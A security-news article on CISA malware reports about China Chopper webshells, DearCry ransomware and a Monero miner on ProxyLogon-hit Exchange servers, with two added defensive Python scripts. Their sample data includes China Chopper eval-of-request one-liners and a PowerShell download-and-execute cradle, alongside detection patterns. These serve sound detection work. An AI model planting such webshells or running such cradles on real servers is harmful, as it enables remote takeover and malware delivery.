CISA Details Malware Found on Hacked Exchange Servers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week published details on additional malware identified on compromised Microsoft Exchange servers, namely China Chopper webshells and DearCry ransomware.


The malware operators reach on-premises Exchange servers through a chain of vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065, collectively known as ProxyLogon) that Microsoft disclosed and patched out-of-band on March 2. The bugs had been exploited in the wild before the public announcement, and exploitation increased sharply once details and patches were available.

On March 3, CISA published an advisory (AA21-062A) on the exploitation of the Exchange vulnerabilities, and this week it updated that alert with Malware Analysis Reports (MARs) covering additional malware observed in the attacks.

The first MAR details China Chopper webshells found on Exchange servers after initial compromise through those vulnerabilities. China Chopper is a very small server-side script that executes whatever code the operator sends in a request parameter, giving the attacker persistent remote command execution on the server without needing to re-exploit it.

CISA analyzed a total of ten webshell samples, but notes that they should not be considered an all-inclusive list of the webshells threat actors are deploying against Exchange servers, so defenders should hunt for the technique rather than only for the listed hashes.
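As an added example (not code from CISA's MAR, Microsoft or this article), the following Python script shows the kind of check a defender would run after reading the MAR: it walks a web-served directory tree, flags ASPX files whose content matches the China Chopper pattern (server-side eval of a request parameter), and optionally matches SHA-256 hashes against an IOC list the operator supplies. The regexes, directory names and sample files are constructed for illustration and do not reproduce the MAR's indicator list.

```python
"""Scan a web-served directory tree for China Chopper-style ASPX webshells.

Added example; not code from CISA, Microsoft or the article. The regexes,
the sample files and the optional IOC hash set are constructed for
illustration and do not reproduce the MAR's indicator list.
"""
import hashlib
import os
import re
import tempfile

WEB_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx"}

# Indicator name -> regex. The first two match the classic China Chopper
# ASPX one-liner, which eval()s the value of a request parameter; the third
# catches the JScript page directive that one-liner relies on; the fourth
# catches the VBScript Execute(Request(...)) equivalent.
INDICATORS = [
    ("eval_of_request_item",
     re.compile(r"eval\s*\(\s*Request\s*\.\s*Item\s*\[", re.I)),
    ("eval_of_request_index",
     re.compile(r"eval\s*\(\s*Request\s*\[", re.I)),
    ("jscript_page_with_eval",
     re.compile(r'Language\s*=\s*"?Jscript"?.*?\beval\s*\(', re.I | re.S)),
    ("vbscript_execute_of_request",
     re.compile(r"\bExecute\s*\(\s*Request\s*\(", re.I)),
]


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def inspect_file(path, known_bad=frozenset()):
    """Return a finding dict for `path`, or None if nothing matched."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    digest = sha256_of(path)
    if digest in known_bad:            # operator-supplied IOC hashes
        hits.append("sha256_in_ioc_list")
    if not hits:
        return None
    return {"path": path, "sha256": digest, "indicators": hits}


def scan_tree(root, known_bad=frozenset()):
    """Walk `root` and inspect every server-side script file under it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in WEB_EXTENSIONS:
                finding = inspect_file(os.path.join(dirpath, name), known_bad)
                if finding:
                    findings.append(finding)
    return sorted(findings, key=lambda f: f["path"])


# Constructed sample files (not real IOCs): one benign page, two shells.
SAMPLES = {
    "owa/auth/logon.aspx":
        '<%@ Page Language="C#" %>\n<html><body>Sign in</body></html>\n',
    "aspnet_client/help.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "ecp/auth/errorFE.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request["z"],"unsafe");%>',
}


def demo():
    """Write the samples into a temporary tree, scan it, and return findings
    with paths made relative so the result is stable across machines."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        findings = scan_tree(root)
        for f in findings:
            f["path"] = os.path.relpath(f["path"], root).replace(os.sep, "/")
        return findings


if __name__ == "__main__":
    for f in demo():
        print(f["path"], f["indicators"], f["sha256"][:16])
```

Pattern matching of this kind is a starting point, not a verdict: obfuscated or multi-stage shells will not match these regexes, so a practitioner would pair the scan with file creation times compared against the last Cumulative Update install, IIS logs showing POST requests to the flagged files, and the hash list from the MAR passed in as `known_bad`.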

The second MAR covers attacks that use the same initial access to drop the DearCry ransomware on vulnerable servers.

Also referred to as DoejoCrypt, DearCry was the first ransomware family observed exploiting these Exchange vulnerabilities. For more than two weeks, the Black Kingdom (also tracked as Pydomer) ransomware has been making similar attempts.


In the newly shared MARs, CISA includes tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help defenders identify and remediate potential compromise.

The attacks on Microsoft Exchange servers are far more diverse than webshells and ransomware, however, and in some cases involve cryptominers. Microsoft itself warned roughly two weeks ago of activity involving the Lemon Duck cryptocurrency botnet.

Now, Sophos reveals that the targeting of Exchange servers for cryptomining dates back to March 9, hours after Microsoft's Patch Tuesday updates addressing the exploited vulnerabilities were released. Ever since, the security firm says, an unknown actor has been compromising servers to deploy a malicious Monero miner.

What makes this campaign stand out is that the malicious payload is hosted on a compromised Exchange server and retrieved from there by a PowerShell command executed on each newly compromised victim. The payload masquerades as a legitimate utility named QuickCPU.

Within days the miner had been loaded onto multiple compromised servers, and the cryptocurrency output spiked significantly. The activity continues, albeit at a much lower pace, as the miner has lost some of the infected servers.
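As an added example (not from Sophos, CISA or this article), the following Python triage script shows how to surface that chain in process-creation telemetry: a shell spawned by the IIS worker process w3wp.exe, which hosts the Exchange web endpoints the webshells run under, combined with a PowerShell download cradle that fetches from a host not on an allow list. The JSON-lines events, field names (modelled on Sysmon Event ID 1) and host names are constructed; `updates.corp.example` plays the role of an approved internal update server and `mail.corp.example` the compromised Exchange host.

```python
"""Triage process-creation events for the webshell -> PowerShell -> download
chain described above.

Added example; not from Sophos, CISA or the article. Events are constructed
JSON lines whose field names mirror Sysmon Event ID 1 (Image, ParentImage,
CommandLine, UtcTime); host names and paths are invented.
"""
import json
import re
from urllib.parse import urlparse

# w3wp.exe is the IIS worker process that hosts the Exchange web endpoints
# (OWA, ECP, autodiscover); a webshell dropped via ProxyLogon runs inside it,
# so a shell with w3wp.exe as parent is the strongest single signal here.
WEB_WORKERS = {"w3wp.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

CRADLE_PATTERNS = [
    ("webclient_download",
     re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I)),
    ("invoke_webrequest",
     re.compile(r"\b(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b", re.I)),
    ("iex_present", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("encoded_command",
     re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("policy_bypass", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def assess(event, trusted_hosts):
    """Return (severity, reasons) for one process-creation event."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent in WEB_WORKERS and image in SHELLS:
        reasons.append(f"shell_spawned_by_{parent}")
    reasons += [name for name, rx in CRADLE_PATTERNS if rx.search(cmd)]
    for url in URL_RE.findall(cmd):
        host = (urlparse(url).hostname or "").lower()
        if host not in trusted_hosts:
            reasons.append(f"download_from_untrusted_host:{host}")
    if not reasons:
        return "none", []
    high = any(r.startswith(("shell_spawned_by_", "download_from_untrusted"))
               for r in reasons)
    return ("high" if high else "low"), reasons


def triage(jsonl_text, trusted_hosts=frozenset()):
    """Parse JSON-lines events and return the ones worth an analyst's time."""
    results = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        severity, reasons = assess(ev, trusted_hosts)
        if reasons:
            results.append({"time": ev.get("UtcTime"),
                            "image": basename(ev.get("Image", "")),
                            "severity": severity, "reasons": reasons})
    return results


# Constructed events: a cradle from the IIS worker, a benign admin command,
# a bare cmd from the IIS worker, and an approved update script.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"UtcTime": "2021-03-09T11:02:11Z", "Image": PS, "ParentImage": W3WP,
     "CommandLine": "powershell -nop -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://mail.corp.example/aspnet_client/qc.ps1')\""},
    {"UtcTime": "2021-03-09T11:05:40Z", "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell Get-Service MSExchange* | Format-Table"},
    {"UtcTime": "2021-03-09T11:07:03Z", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": W3WP, "CommandLine": "cmd /c whoami"},
    {"UtcTime": "2021-03-09T12:00:00Z", "Image": PS,
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "powershell -File C:\\Scripts\\patch.ps1 "
                    "-Source https://updates.corp.example/cu23.exe"},
])
TRUSTED = frozenset({"updates.corp.example"})

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG, TRUSTED):
        print(hit["time"], hit["severity"], hit["image"], ", ".join(hit["reasons"]))
```

The allow list is what keeps this usable: a download cradle on its own is common in legitimate automation, so the script rates it "low" unless the parent is the IIS worker or the source host is unknown. In the miner campaign described above the source host is itself a compromised Exchange server, which is exactly why host reputation alone would not catch it and the parent-process signal matters.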

Related: CISA Releases Tool to Detect Microsoft 365 Compromise

Related: CISA, FBI Warn of Attacks Targeting Fortinet FortiOS

Related: CISA Warns Organizations About Attacks on Cloud Services

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

